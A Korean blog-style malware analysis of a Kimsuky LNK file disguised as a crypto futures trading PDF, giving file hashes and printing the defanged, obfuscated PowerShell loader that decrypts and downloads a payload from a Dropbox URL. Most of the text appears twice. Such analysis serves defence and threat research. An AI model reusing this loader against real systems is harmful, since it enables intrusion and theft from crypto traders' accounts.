김수키(Kimsuky) 코인 선물 트레이딩으로 위장 하고 있는 악성코드-코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk(2024.10.14)
Contents
오늘은 언제나 김수키(Kimsuky)에서 만든 악성코드인 코인 선물 트레이딩으로 위장하는 악성코드-코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk(2024.10.14)에 대해 글을 적어 보겠습니다.
일단 해당 악성코드는 제목에서도 알 수가 있듯이 코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리이라는 제목으로 돼 있으며 해당 악성코드는 코인 이나 선물 같은 것을 하는 분들을 노려서 계정을 털고 해당 수익을 탈취하려고 하는 목적이 매우 눈에 보이는 악성코드입니다.
먼저 악성코드 해쉬값
파일명: 코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk
사이즈:9.98 MB
MD5:4e317495e0c2ae3e46a9f7a810184b30
SHA-1:d47fe15d4f1176e1952d11b2cfeaebb1b8e2f2b7
SHA-256:af0b9aea91b2ea6567fbd4ba19839b42b05e0a7ef0da4f497505f998ca3c0503
입니다.
그리고 악성코드 에 포함된 PowerShell 코드는 다음과 같습니다.
StringData
{
namestring: Type: Text (D)ocument
Size: 5.23 KB
Date modified: 01/02/(2)020 11:23
relativepath: not present
workingdir: not present
commandl(i)nearguments:
/c powe(r)shell -win(d)owstyle hidden -nop -No(P)rofile -NonI(n)teractive
-c "$tmp = '%t(e)mp%';$lnkxx(x)xxx(x)xxxxxxxxx = 0x009(F)D0E0;$len1 =
1053(8)92;$len2 = 1045(8)736;$len3 = 10(4)58736;$alis=@('m(o)rySt',
'898','De(r)ive');$ms=-join ('Me',$ali(s)[0],'ream');$rf=(-)join('Rfc2'
,($)alis[1],$alis[2],'Bytes');$st(r)=@($ms,'ry(p)to',$rf, 'esM(a)nag',
'rea');$re(p)=@('msx','r(x)','R(F)DB','ma(n)g','ff');$def='u(s)ing Syst
em;using Syst(e)m.IO;using Syste(m).Security.Cr(x)graphy;public class I
nit{public st(a)tic Byte[] Dec(Byte[] inBy(t)es,string pwd){msx im=new
msx(inByte(s));Byte[] s=new Byte[(3)2];int len=im.(R)ead(s,0,s.Leng(t)h
);if(len!=s.L(e)ngth){ret(u)rn null;}RF(D)B pbk=new RFDB(pwd(,)s);Byte[
] key=pbk(.)GetBytes(32);Byte[] iv=p(b)k.GetBytes(16);Aman(g)ed ma=new
Ama(n)ged();ICrxTransform Dec=ma.Cf(f)teDecrxr(key,iv);Cr(x)Stffm cs=ne
w CrxS(t)ffm(im,Dec,0);m(s)x om=new msx();cs.CopyT(o)(om);om.Dispose();
ret(u)rn om.ToArray();}}';$i=0;$(a)=1;$p='hoop';$s(=)@(':','s:')(;)$r=$
p -replace 'o','(t)';foreach(()$i(t)em in $rep){$d(e)f=$def -replace $i
tem,$str[($)i];$i++;}Add(-)Type -Ty(p)eDefinition $def;$pwd='pa55w0rd';
$uh='dl.dropboxuser(c)ontent(.)com/scl/fi/';$agent=('Mozilla/5.0','(Wi(
n)dows NT 10.0; Win64; x64)','AppleW(e)bKit/537.36','(KHTML,li(k)e Geck
o)','Chrome/104(.)0.0.0','Safari/(5)37.36') -join ' ';$r=-j(o)in ($r,$s
[$a],'//',$uh);$ui=$r+'unk6wfun4ys2hyoekf00w/ad_ps.bin?rlkey=tzje3yre9h
cve3i3b62pur1ou&st=d0n1avij&dl=0';$req=@{uri=$ui;useragent=$agent};tr(y
){[Byte[]]$b(y)tes=(wget …
일단 해당 악성코드는 제목에서도 알 수가 있듯이 코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리이라는 제목으로 돼 있으며 해당 악성코드는 코인 이나 선물 같은 것을 하는 분들을 노려서 계정을 털고 해당 수익을 탈취하려고 하는 목적이 매우 눈에 보이는 악성코드입니다.
먼저 악성코드 해쉬값
파일명: 코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk
사이즈:9.98 MB
MD5:4e317495e0c2ae3e46a9f7a810184b30
SHA-1:d47fe15d4f1176e1952d11b2cfeaebb1b8e2f2b7
SHA-256:af0b9aea91b2ea6567fbd4ba19839b42b05e0a7ef0da4f497505f998ca3c0503
입니다.
그리고 악성코드 에 포함된 PowerShell 코드는 다음과 같습니다.
StringData
{
namestring: Type: Text (D)ocument
Size: 5.23 KB
Date modified: 01/02/(2)020 11:23
relativepath: not present
workingdir: not present
commandl(i)nearguments:
/c powe(r)shell -win(d)owstyle hidden -nop -No(P)rofile -NonI(n)teractive
-c "$tmp = '%t(e)mp%';$lnkxx(x)xxx(x)xxxxxxxxx = 0x009(F)D0E0;$len1 =
1053(8)92;$len2 = 1045(8)736;$len3 = 10(4)58736;$alis=@('m(o)rySt',
'898','De(r)ive');$ms=-join ('Me',$ali(s)[0],'ream');$rf=(-)join('Rfc2'
,($)alis[1],$alis[2],'Bytes');$st(r)=@($ms,'ry(p)to',$rf, 'esM(a)nag',
'rea');$re(p)=@('msx','r(x)','R(F)DB','ma(n)g','ff');$def='u(s)ing Syst
em;using Syst(e)m.IO;using Syste(m).Security.Cr(x)graphy;public class I
nit{public st(a)tic Byte[] Dec(Byte[] inBy(t)es,string pwd){msx im=new
msx(inByte(s));Byte[] s=new Byte[(3)2];int len=im.(R)ead(s,0,s.Leng(t)h
);if(len!=s.L(e)ngth){ret(u)rn null;}RF(D)B pbk=new RFDB(pwd(,)s);Byte[
] key=pbk(.)GetBytes(32);Byte[] iv=p(b)k.GetBytes(16);Aman(g)ed ma=new
Ama(n)ged();ICrxTransform Dec=ma.Cf(f)teDecrxr(key,iv);Cr(x)Stffm cs=ne
w CrxS(t)ffm(im,Dec,0);m(s)x om=new msx();cs.CopyT(o)(om);om.Dispose();
ret(u)rn om.ToArray();}}';$i=0;$(a)=1;$p='hoop';$s(=)@(':','s:')(;)$r=$
p -replace 'o','(t)';foreach(()$i(t)em in $rep){$d(e)f=$def -replace $i
tem,$str[($)i];$i++;}Add(-)Type -Ty(p)eDefinition $def;$pwd='pa55w0rd';
$uh='dl.dropboxuser(c)ontent(.)com/scl/fi/';$agent=('Mozilla/5.0','(Wi(
n)dows NT 10.0; Win64; x64)','AppleW(e)bKit/537.36','(KHTML,li(k)e Geck
o)','Chrome/104(.)0.0.0','Safari/(5)37.36') -join ' ';$r=-j(o)in ($r,$s
[$a],'//',$uh);$ui=$r+'unk6wfun4ys2hyoekf00w/ad_ps.bin?rlkey=tzje3yre9h
cve3i3b62pur1ou&st=d0n1avij&dl=0';$req=@{uri=$ui;useragent=$agent};tr(y
){[Byte[]]$b(y)tes=(wget …
IoC
4e317495e0c2ae3e46a9f7a810184b30
d47fe15d4f1176e1952d11b2cfeaebb1b8e2f2b7
af0b9aea91b2ea6567fbd4ba19839b42b05e0a7ef0da4f497505f998ca3c0503
d47fe15d4f1176e1952d11b2cfeaebb1b8e2f2b7
af0b9aea91b2ea6567fbd4ba19839b42b05e0a7ef0da4f497505f998ca3c0503